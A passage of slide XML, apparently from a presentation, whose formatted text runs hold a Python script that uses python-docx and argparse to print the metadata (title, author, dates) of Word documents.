                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>as</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e</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"Error: "</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e</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a: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get_docx_metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</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doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a: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"Title:"</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doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.core_properties.title)</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"Author:"</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doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.core_properties.author)</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"Subject:"</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doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.core_properties.subject)</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"Keywords:"</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doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.core_properties.keywords)</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"Creation Date:"</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doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.core_properties.created)</a:t>
            </a:r>
            <a:endParaRPr sz="16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600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"Modification Date:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.core_properties.modified)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1100">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g2073b6da4c1_0_9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a:t>Contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1039" name="Google Shape;1039;g2073b6da4c1_0_94"/>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
        <p:nvSpPr>
          <p:cNvPr id="1040" name="Google Shape;1040;g2073b6da4c1_0_94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477300" y="2100450"/>
            <a:ext cx="10697400" cy="4690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i="1" lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>__name__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"__main__"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>argparse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ArgumentParser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"Examine metadata in PDFs and Microsoft Documents"</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="98C379"/>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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    )</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>add_argument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"file_path"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"Path to the file"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>parser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>parse_args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr sz="15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00">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
